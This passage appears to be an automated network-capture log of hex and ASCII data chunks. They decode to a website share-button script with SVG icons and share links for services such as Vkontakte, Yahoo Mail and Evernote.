4d 32 34 2e 30 39 20 31 34
                                                                                              Data Ascii: 2.1 1.37 1.55 2.94a5.21 5.21 0 0 1-4.29 3.27zM17.06 4.79A10.42 10.42 0 0 1 26.79 15c0 .51.18 1.27-.58 1.25s-.54-.78-.6-1.29c-.7-5.52-3.23-8.13-8.71-9-.45-.07-1.15 0-1.11-.57.05-.87.87-.54 1.27-.6z" fill="#fff" fill-rule="evenodd"></path><path d="M24.09 14
                                                                                              2021-12-13 23:57:32 UTC8716INData Raw: 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 32 35 2e 35 31 35 20 36 2e 38 39 36 4c 36 2e 30 32 37 20 31 34 2e 34 31 63 2d 31 2e 33 33 2e 35 33 34 2d 31 2e 33 32 32 20 31 2e 32 37 36 2d 2e 32 34 33 20 31 2e 36 30 36 6c 35 20 31 2e 35 36 20 31 2e 37 32 20 35 2e 36 36 63 2e 32 32 36 2e 36 32 35 2e 31 31 35 2e 38 37 33 2e 37 37 2e 38 37 33 2e 35 30 36 20 30 20 2e 37 33 2d 2e 32 33 35 20 31 2e 30 31 32 2d 2e 35 31 6c 32 2e 34 33 2d 32 2e 33 36 33 20 35 2e 30 35 36 20 33 2e 37 33 34 63 2e 39 33 2e 35 31 34 20 31 2e 36 30 32 2e 32 35 20 31 2e 38 33 34 2d 2e 38 36 33 6c 33 2e 33 32 2d 31 35 2e 36 33 38 63 2e 33 33 38 2d 31 2e 33 36 33 2d 2e 35 32 2d 31 2e 39 38 2d 31 2e 34 31 2d 31 2e 35 37 37 7a 22 3e 3c 2f 70 61 74
                                                                                              Data Ascii: 32 32"><path fill="#fff" d="M25.515 6.896L6.027 14.41c-1.33.534-1.322 1.276-.243 1.606l5 1.56 1.72 5.66c.226.625.115.873.77.873.506 0 .73-.235 1.012-.51l2.43-2.363 5.056 3.734c.93.514 1.602.25 1.834-.863l3.32-15.638c.338-1.363-.52-1.98-1.41-1.577z"></pat
                                                                                              2021-12-13 23:57:32 UTC8718INData Raw: 31 2e 37 30 39 20 31 2e 37 30 39 20 30 20 30 20 31 2d 31 2e 37 30 39 20 31 2e 37 31 31 20 31 2e 37 33 33 20 31 2e 37 33 33 20 30 20 30 20 31 2d 31 2e 37 33 2d 31 2e 37 31 31 7a 6d 39 2e 35 36 35 20 34 2e 39 36 38 61 35 2e 35 37 33 20 35 2e 35 37 33 20 30 20 30 20 31 2d 34 2e 30 38 31 20 31 2e 32 37 32 68 2d 2e 30 33 32 61 35 2e 35 37 36 20 35 2e 35 37 36 20 30 20 30 20 31 2d 34 2e 30 38 37 2d 31 2e 32 37 32 2e 36 2e 36 20 30 20 30 20 31 20 2e 38 34 34 2d 2e 38 35 34 20 34 2e 35 20 34 2e 35 20 30 20 30 20 30 20 33 2e 32 33 38 2e 39 32 37 68 2e 30 33 32 61 34 2e 35 20 34 2e 35 20 30 20 30 20 30 20 33 2e 32 33 37 2d 2e 39 32 37 2e 36 2e 36 20 30 20 31 20 31 20 2e 38 34 34 2e 38 35 34 7a 6d 2d 2e 33 33 31 2d 33 2e 32 35 36 61 31 2e 37 32 36 20 31 2e 37 32 36
                                                                                              Data Ascii: 1.709 1.709 0 0 1-1.709 1.711 1.733 1.733 0 0 1-1.73-1.711zm9.565 4.968a5.573 5.573 0 0 1-4.081 1.272h-.032a5.576 5.576 0 0 1-4.087-1.272.6.6 0 0 1 .844-.854 4.5 4.5 0 0 0 3.238.927h.032a4.5 4.5 0 0 0 3.237-.927.6.6 0 1 1 .844.854zm-.331-3.256a1.726 1.726
                                                                                              2021-12-13 23:57:32 UTC8719INData Raw: 38 2e 39 76 2d 34 2e 33 32 33 61 37 2e 32 33 33 20 37 2e 32 33 33 20 30 20 30 20 31 2d 34 2e 35 37 34 2d 34 2e 35 37 37 7a 22 2f 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 27 7d 2c 67 65 6e 74 6c 65 72 65 61 64 65 72 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 34 36 61 65 63 66 22 2c 74 69 74 6c 65 3a 22 47 65 6e 74 6c 65 52 65 61 64 65 72 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 2e 67 65 6e 74 6c 65 72 65 61 64 65 72 2e 63 6f 6d 2f 62 6f 6f 6b 6d 61 72 6b 3f 75 72 6c 3d 22 2b 61 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30
                                                                                              Data Ascii: 8.9v-4.323a7.233 7.233 0 0 1-4.574-4.577z"/></g></svg>'},gentlereader:{background_color:"#46aecf",title:"GentleReader",redirect_url:"https://app.gentlereader.com/bookmark?url="+a,svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000
                                                                                              2021-12-13 23:57:32 UTC8720INData Raw: 2d 39 20 2d 31 34 20 2d 39 20 30 20 6d 20 35 20 30 20 76 20 37 20 6d 20 2d 31 20 30 20 76 20 2d 37 20 6d 20 34 20 2d 37 20 68 20 34 2e 35 20 76 20 2d 35 20 68 20 38 20 76 20 38 20 68 20 2d 38 20 76 20 2d 33 20 6d 20 38 20 30 20 68 20 34 20 76 20 35 2e 35 20 68 20 2d 33 20 76 20 31 32 20 68 20 2d 34 20 76 20 2d 38 20 6d 20 30 20 38 20 68 20 2d 36 2e 35 20 76 20 2d 31 32 20 68 20 2d 32 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 20 73 74 72 6f 6b 65 3d 22 23 66 66 66 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 2f 70 61 74 68 3e 3c 65 6c 6c 69 70 73 65 20 63 78 3d 22 31 31 2e 35 22 20 63 79 3d 22 32 38 2e 35 22 20 72 78 3d 22 34 22 20 72 79 3d 22 32 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 23 66 66 66 3b 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 2f
                                                                                              Data Ascii: -9 -14 -9 0 m 5 0 v 7 m -1 0 v -7 m 4 -7 h 4.5 v -5 h 8 v 8 h -8 v -3 m 8 0 h 4 v 5.5 h -3 v 12 h -4 v -8 m 0 8 h -6.5 v -12 h -2" stroke-width="2" stroke="#fff" fill="none"></path><ellipse cx="11.5" cy="28.5" rx="4" ry="2" style="fill:#fff;"></ellipse></
                                                                                              2021-12-13 23:57:32 UTC8722INData Raw: 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 2e 31 22 20 64 3d 22 4d 39 2e 38 34 34 20 36 2e 35 31 36 68 31 32 2e 33 31 32 76 37 2e 33 31 48 39 2e 38 34 34 7a 22 2f 3e 3c 70 61 74 68 20 73 74 72 6f 6b 65 3d 22 23 66 66 66 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 2e 31 22 20 64 3d 22 4d 38 2e 36 30 32 20 31 37 2e 33 37 68 31 34 2e 35 37 34 76 33 2e 33 39 36 48 38 2e 36 30 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 73 74 72 6f 6b 65 3d 22 23 66 66 66 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 2e 31 22 20 64 3d 22 4d 31 30 2e 31 35 32 20 31 37 2e 39 37 68 31 31 2e 32 37 6c 32 2e 32 33 33 20 37 2e 35 31 35 48 37 2e 39 32 6c 32 2e 32 33 32 2d 37 2e 35 31 34 7a 22 2f 3e 3c 2f 73 76 67 3e 27 7d 2c 74 75 6d 62 6c 72 3a 7b 62 61 63
                                                                                              Data Ascii: troke-width=".1" d="M9.844 6.516h12.312v7.31H9.844z"/><path stroke="#fff" stroke-width=".1" d="M8.602 17.37h14.574v3.396H8.602z"/><path fill="#fff" stroke="#fff" stroke-width=".1" d="M10.152 17.97h11.27l2.233 7.515H7.92l2.232-7.514z"/></svg>'},tumblr:{bac
                                                                                              2021-12-13 23:57:32 UTC8723INData Raw: 69 74 6c 65 3a 22 56 6b 6f 6e 74 61 6b 74 65 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 76 6b 2e 63 6f 6d 2f 73 68 61 72 65 2e 70 68 70 3f 75 72 6c 3d 22 2b 61 2b 22 26 74 69 74 6c 65 3d 22 2b 62 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 2d 31 20 2d 32 20 33 34 20 33 34 22 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 66 69
                                                                                              Data Ascii: itle:"Vkontakte",redirect_url:"https://vk.com/share.php?url="+a+"&title="+b,svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="-1 -2 34 34"><path fill-rule="evenodd" clip-rule="evenodd" fi
                                                                                              2021-12-13 23:57:32 UTC8724INData Raw: 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 78 2e 73 72 63 3d 45 4e 5f 43 4c 49 50 5f 48 4f 53 54 2b 27 2f 70 75 62 6c 69 63 2f 62 6f 6f 6b 6d 61 72 6b 43 6c 69 70 70 65 72 2e 6a 73 3f 27 2b 28 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2f 31 30 30 30 30 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 78 29 3b 7d 63 61 74 63 68 28 65 29 7b 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 45 4e 5f 43 4c 49 50 5f 48 4f 53 54 2b 27 2f 63 6c 69 70 2e 61 63 74 69 6f 6e 3f 75 72 6c 3d 27 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 27 26 74 69 74 6c 65 3d 27
                                                                                              Data Ascii: e='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&title='
                                                                                              2021-12-13 23:57:32 UTC8726INData Raw: 37 66 66 38 0d 0a 34 2e 31 39 37 20 31 2e 37 2e 33 37 33 20 32 2e 38 36 34 2e 35 31 20 31 2e 30 35 35 2e 31 32 20 31 2e 38 32 2e 35 33 37 20 31 2e 38 32 20 33 2e 32 34 20 30 20 31 2e 36 34 35 2d 2e 33 34 36 20 31 2e 38 37 2d 32 2e 31 35 32 20 31 2e 38 37 2d 31 2e 34 36 34 20 30 2d 32 2e 30 32 2e 30 33 38 2d 32 2e 30 32 2d 31 2e 31 32 35 20 30 2d 2e 39 33 38 2e 39 33 2d 2e 38 34 32 20 31 2e 36 31 36 2d 2e 38 34 32 2e 33 31 20 30 20 2e 30 38 36 2d 2e 32 33 2e 30 38 36 2d 2e 38 31 20 30 2d 2e 35 37 36 2e 33 36 2d 2e 39 31 2e 30 32 2d 2e 39 31 38 2d 32 2e 33 38 34 2d 2e 30 36 35 2d 33 2e 37 38 36 2d 2e 30 30 34 2d 33 2e 37 38 36 20 32 2e 39 37 38 20 30 20 32 2e 37 30 36 20 31 2e 30 33 36 20 33 2e 32 30 38 20 34 2e 34 31 38 20 33 2e 32 30 38 20 32 2e 36 35 20
                                                                                              Data Ascii: 7ff84.197 1.7.373 2.864.51 1.055.12 1.82.537 1.82 3.24 0 1.645-.346 1.87-2.152 1.87-1.464 0-2.02.038-2.02-1.125 0-.938.93-.842 1.616-.842.31 0 .086-.23.086-.81 0-.576.36-.91.02-.918-2.384-.065-3.786-.004-3.786 2.978 0 2.706 1.036 3.208 4.418 3.208 2.65
                                                                                              2021-12-13 23:57:32 UTC8727INData Raw: 2e 35 37 33 20 31 2e 37 34 38 2d 38 2e 32 31 35 20 31 2e 38 30 35 2d 2e 30 39 37 2e 30 30 34 2d 2e 31 39 33 2e 30 30 34 2d 2e 32 39 2e 30 30 34 2d 34 2e 31 35 33 2e 30 30 33 2d 37 2e 35 34 34 2d 31 2e 39 32 36 2d 31 30 2e 39 36 34 2d 33 2e 38 32 33 2d 2e 31 32 2d 2e 30 36 2d 2e 32 34 2d 2e 30 39 34 2d 2e 33 36 2d 2e 30 39 34 2d 2e 31 35 36 20 30 2d 2e 33 31 33 2e 30 35 38 2d 2e 34 33 2e 31 36 34 2d 2e 31 31 34 2e 31 30 36 2d 2e 31 38 33 2e 32 36 36 2d 2e 31 38 32 2e 34 32 36 20 30 20 2e 32 30 37 2e 31 31 32 2e 33 39 35 2e 32 36 37 2e 35 32 20 33 2e 32 31 20 32 2e 37 38 36 20 36 2e 37 33 20 35 2e 33 37 36 20 31 31 2e 34 36 20 35 2e 33 37 38 2e 30 39 34 20 30 20 2e 31 38 38 2d 2e 30 30 32 2e 32 38 2d 2e 30 30 34 20 33 2e 30 31 2d 2e 30 37 20 36 2e 34 31 35
                                                                                              Data Ascii: .573 1.748-8.215 1.805-.097.004-.193.004-.29.004-4.153.003-7.544-1.926-10.964-3.823-.12-.06-.24-.094-.36-.094-.156 0-.313.058-.43.164-.114.106-.183.266-.182.426 0 .207.112.395.267.52 3.21 2.786 6.73 5.376 11.46 5.378.094 0 .188-.002.28-.004 3.01-.07 6.415
                                                                                              2021-12-13 23:57:32 UTC8728INData Raw: 2d 32 2e 31 32 35 2e 31 36 37 2d 34 2e 30 38 32 2d 31 2e 33 39 37 2d 35 2e 35 33 34 2d 31 2e 32 38 35 2d 31 2e 31 37 33 2d 33 2e 33 2d 31 2e 36 32 2d 34 2e 38 36 34 2d 31 2e 36 32 68 2d 2e 36 37 32 63 2d 32 2e 38 35 2e 31 36 34 2d 35 2e 38 36 38 20 31 2e 33 39 35 2d 36 2e 35 34 20 34 2e 39 31 38 2d 2e 31 31 2e 34 34 37 2e 32 32 36 2e 36 31 33 2e 34 35 2e 36 37 6c 33 2e 31 33 2e 33 39 63 2e 33 33 36 2d 2e 30 35 35 2e 35 30 32 2d 2e 33 33 36 2e 35 36 2d 2e 36 31 33 2e 32 37 38 2d 31 2e 32 33 20 31 2e 32 38 34 2d 31 2e 38 34 35 20 32 2e 34 2d 31 2e 39 36 68 2e 32 32 37 63 2e 36 37 20 30 20 31 2e 33 39 37 2e 32 38 20 31 2e 37 39 2e 38 34 2e 34 34 37 2e 36 37 2e 33 39 20 31 2e 35 36 38 2e 33 39 20 32 2e 33 35 76 2e 34 34 36 7a 6d 2d 2e 36 31 33 20 36 2e 36 35
                                                                                              Data Ascii: -2.125.167-4.082-1.397-5.534-1.285-1.173-3.3-1.62-4.864-1.62h-.672c-2.85.164-5.868 1.395-6.54 4.918-.11.447.226.613.45.67l3.13.39c.336-.055.502-.336.56-.613.278-1.23 1.284-1.845 2.4-1.96h.227c.67 0 1.397.28 1.79.84.447.67.39 1.568.39 2.35v.446zm-.613 6.65
                                                                                              2021-12-13 23:57:32 UTC8730INData Raw: 34 33 20 31 2e 37 36 36 6c 2d 33 2e 38 35 20 31 31 2e 31 38 63 31 2e 31 35 2e 33 34 20 32 2e 33 36 35 2e 35 32 33 20 33 2e 36 32 34 2e 35 32 33 20 31 2e 34 39 32 20 30 20 32 2e 39 32 35 2d 2e 32 36 20 34 2e 32 36 2d 2e 37 32 38 61 31 2e 32 33 35 20 31 2e 32 33 35 20 30 20 30 20 31 2d 2e 30 39 33 2d 2e 31 37 37 4c 31 36 2e 32 32 35 20 31 37 2e 31 32 7a 4d 32 37 2e 32 35 20 39 2e 38 34 38 63 2e 30 35 35 2e 34 30 38 2e 30 38 36 2e 38 34 38 2e 30 38 36 20 31 2e 33 31 38 20 30 20 31 2e 33 2d 2e 32 34 32 20 32 2e 37 36 34 2d 2e 39 37 35 20 34 2e 35 39 34 6c 2d 33 2e 39 31 34 20 31 31 2e 33 32 34 43 32 36 2e 32 36 20 32 34 2e 38 36 20 32 38 2e 38 32 32 20 32 30 2e 37 33 20 32 38 2e 38 32 32 20 31 36 63 30 2d 32 2e 32 33 2d 2e 35 36 38 2d 34 2e 33 32 36 2d 31 2e
                                                                                              Data Ascii: 43 1.766l-3.85 11.18c1.15.34 2.365.523 3.624.523 1.492 0 2.925-.26 4.26-.728a1.235 1.235 0 0 1-.093-.177L16.225 17.12zM27.25 9.848c.055.408.086.848.086 1.318 0 1.3-.242 2.764-.975 4.594l-3.914 11.324C26.26 24.86 28.822 20.73 28.822 16c0-2.23-.568-4.326-1.
                                                                                              2021-12-13 23:57:32 UTC8731INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 32 33 2e 38 31 20 34 2e 35 63 2e 30 31 32 2e 31 39 38 2e 30 33 35 2e 33 39 36 2e 30 33 35 2e 35 39 33 20 30 20 34 2e 38 30 37 2e 30 32 36 20 39 2e 36 31 35 2d 2e 30 31 20 31 34 2e 34 32 32 2d 2e 30 32 20 33 2e 32 34 38 2d 31 2e 35 20 35 2e 36 37 38 2d 34 2e 33 39 33 20 37 2e 31 35 38 2d 34 2e 36 36 20 32 2e 33 38 35 2d 31 30 2e 34 39 35 2d 2e 36 34
                                                                                              Data Ascii: "http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill-rule="evenodd" clip-rule="evenodd" fill="#fff" d="M23.81 4.5c.012.198.035.396.035.593 0 4.807.026 9.615-.01 14.422-.02 3.248-1.5 5.678-4.393 7.158-4.66 2.385-10.495-.64
                                                                                              2021-12-13 23:57:32 UTC8732INData Raw: 2e 37 33 20 36 2e 36 30 34 20 37 2e 36 31 20 36 2e 36 30 34 61 37 2e 36 39 33 20 37 2e 36 39 33 20 30 20 30 20 30 20 37 2e 36 39 32 2d 37 2e 36 39 36 20 37 2e 36 39 34 20 37 2e 36 39 34 20 30 20 30 20 30 2d 37 2e 36 39 35 2d 37 2e 36 39 35 7a 6d 30 20 31 32 2e 31 32 36 61 34 2e 34 33 32 20 34 2e 34 33 32 20 30 20 30 20 31 2d 34 2e 34 33 34 2d 34 2e 34 33 32 20 34 2e 34 33 32 20 34 2e 34 33 32 20 30 20 31 20 31 20 38 2e 38 36 33 20 30 20 34 2e 34 33 33 20 34 2e 34 33 33 20 30 20 30 20 31 2d 34 2e 34 33 34 20 34 2e 34 33 32 7a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 27 7d 2c 61 6f 6c 5f 6d 61 69 6c 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 32 61 32 61 32 61 22 2c 74 69 74 6c 65 3a 22 41 4f 4c 20 4d 61 69 6c 22 2c 72 65 64 69 72 65
                                                                                              Data Ascii: .73 6.604 7.61 6.604a7.693 7.693 0 0 0 7.692-7.696 7.694 7.694 0 0 0-7.695-7.695zm0 12.126a4.432 4.432 0 0 1-4.434-4.432 4.432 4.432 0 1 1 8.863 0 4.433 4.433 0 0 1-4.434 4.432z"></path></svg>'},aol_mail:{background_color:"#2a2a2a",title:"AOL Mail",redire
                                                                                              2021-12-13 23:57:32 UTC8734INData Raw: 68 32 2e 30 36 37 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e 27 7d 2c 79 61 68 6f 6f 5f 6d 61 69 6c 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 34 30 30 30 39 30 22 2c 74 69 74 6c 65 3a 22 59 61 68 6f 6f 20 4d 61 69 6c 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 70 6f 73 65 2e 6d 61 69 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 3f 53 75 62 6a 65 63 74 3d 22 2b 62 2b 22 26 62 6f 64 79 3d 4c 69 6e 6b 3a 20 22 2b 61 2c 73 76 67 3a 27 3c 73 76 67 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30
                                                                                              Data Ascii: h2.067z" fill="#fff"/></svg>'},yahoo_mail:{background_color:"#400090",title:"Yahoo Mail",redirect_url:"https://compose.mail.yahoo.com/?Subject="+b+"&body=Link: "+a,svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="10
                                                                                              2021-12-13 23:57:32 UTC8735INData Raw: 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 32 30 2e 32 31 35 20 31 36 2e 30 31 36 68 2d 38 2e 34 33 56 39 2e 37 68 38 2e 34 33 76 36 2e 33 31 36 7a 6d 34 2e 32 20 34 2e 32 56 35 2e 35 48 37 2e 35 38 35 76 32 31 68 34 2e 32 76 2d 36 2e 32 38 35 68 31 32 2e 36 33 7a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 27 7d 2c 61 69 6d 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 23 31 30 66 66 30 30 22 2c 74 69 74 6c 65 3a 22 41 49 4d 22 2c 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 22 68 74 74 70 3a 2f 2f 73 68 61 72 65 2e 61 69 6d 2e 63 6f 6d
                                                                                              Data Ascii: 3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill="#fff" d="M20.215 16.016h-8.43V9.7h8.43v6.316zm4.2 4.2V5.5H7.585v21h4.2v-6.285h12.63z"></path></svg>'},aim:{background_color:"#10ff00",title:"AIM",redirect_url:"http://share.aim.com
                                                                                              2021-12-13 23:57:32 UTC8736INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 31 30 37 20 34 73 32 2e 38 33 38 20 31 2e 38 38 20 33 2e 33 32 36 20 37 2e 30 35 63 30 20 30 20 2e 39 35 37 20 31 32 2e 34 32 33 2d 35 2e 34 37 20 31 34 2e 38 35 38 20 30 20 30 20 2e 35 37 37 2e 31 30 36 20 31 2e 32 32 34 2e 30 37 36 20 30 20 30 20 37 2e 39 34 37 2d 35 2e 30 31 32 20 34 2e 33 2d 31 34 2e 37 34 32 20 30 20 30 2d 31 2e 30 39 2d 33 2e 33 39 36 2d 33 2e 33 38 2d 37 2e 32 34 32 7a 6d 34 2e 31 35 20 38 2e 34 38 33 73 2d 31 2e 34 38 2d 32 2e 32 39 2e 33 39 37 2d 34 2e 31 38 63 30 20 30 20 2e 36 35 38 2d 2e 37 32 35 20 32 2e 35 33 37 2d 31 2e 32 30 32 20 30 20 30 20 31 2e 38 38 2d 2e 34 20 32 2e 38 39 37 2d 32 2e 35 35 33 20 30 20 30 20 32 2e 31 30 35 20 32 2e 39 34 2e
                                                                                              Data Ascii: fill="#fff"><path d="M15.107 4s2.838 1.88 3.326 7.05c0 0 .957 12.423-5.47 14.858 0 0 .577.106 1.224.076 0 0 7.947-5.012 4.3-14.742 0 0-1.09-3.396-3.38-7.242zm4.15 8.483s-1.48-2.29.397-4.18c0 0 .658-.725 2.537-1.202 0 0 1.88-.4 2.897-2.553 0 0 2.105 2.94.
                                                                                              2021-12-13 23:57:32 UTC8738INData Raw: 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 31 37 2e 33 35 37 20 31 38 2e 39 31 33 6c 2d 35 2e 30 31 20 35 2e 30 31 34 2e 38 38 2d 34 2e 35 2d 36 2e 35 38 38 2d 38 2e 30 37 35 2d 33 2e 34 38 2e 30 34 34 20 34 2e 33 31 34 2d 34 2e 33 31 33 20 34 2e 30 33 35 2d 34 2e 30 34 56 36 2e 38 35 6c 37 2e 37 39 35 20 36 2e 34 30 33 20 34 2e 35 30 32 2d 2e 37 38 36 2d 34 2e 38 37 36 20 34 2e 38 37 20 39 2e 39 30 38 20 31 31 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 27 7d 2c 62 6c 6f 67 67 65 72 5f 70 6f 73
                                                                                              Data Ascii: ="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill="#fff" d="M17.357 18.913l-5.01 5.014.88-4.5-6.588-8.075-3.48.044 4.314-4.313 4.035-4.04V6.85l7.795 6.403 4.502-.786-4.876 4.87 9.908 11.62"></path></svg>'},blogger_pos
                                                                                              2021-12-13 23:57:32 UTC8739INData Raw: 6c 65 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 44 32 44 45 36 31 22 20 64 3d 22 4d 31 36 20 38 2e 38 37 35 63 2d 36 2e 36 32 37 20 30 2d 31 32 20 33 2e 32 32 35 2d 31 32 20 37 2e 32 30 32 20 30 20 2e 38 34 34 2e 33 34 32 20 32 2e 32 31 2e 37 38 37 20 32 2e 34 30 37 2e 34 34 37 2e 31 39 36 20 31 2e 36 37 2e 36 38 33 20 31 32 2e 35 32 33 2d 33 2e 38 33 36 20 30 20 30 2d 39 2e 30 39 36 20 34 2e 30 39 2d 39 2e 38 33 20 35 2e 38 35 2d 2e
                                                                                              Data Ascii: le="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 32 32"><path fill="#D2DE61" d="M16 8.875c-6.627 0-12 3.225-12 7.202 0 .844.342 2.21.787 2.407.447.196 1.67.683 12.523-3.836 0 0-9.096 4.09-9.83 5.85-.
                                                                                              2021-12-13 23:57:32 UTC8740INData Raw: 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 31 36 2e 30 30 35 20 36 2e 32 34 34 63 32 2e 39 32 37 20 30 20 35 2e 38 35 34 2d 2e 30 30 32 20 38 2e 37 38 32 20 30 20 31 2e 33 39 36 2e 30 30 32 20 32 2e 31 39 35 2e 37 38 20 32 2e 31 38 38 20 32 2e 31 36 35 2d 2e 30 31 35 20 32 2e 34 38 33 2e 31 31 36 20 34 2e 39 38 35 2d 2e 31 31 20 37 2e 34 35 34 2d 2e 37 35 20 38 2e 32 30 34 2d 31 30 2e 30 32 37 20 31 32 2e 36 30 37 2d 31 36 2e 39 31 20 38 2e 30 36 34 2d 33 2e 30 38 36 2d 32 2e 30 33 37 2d 34 2e 38 32 2d 34 2e 39 32 36 2d 34
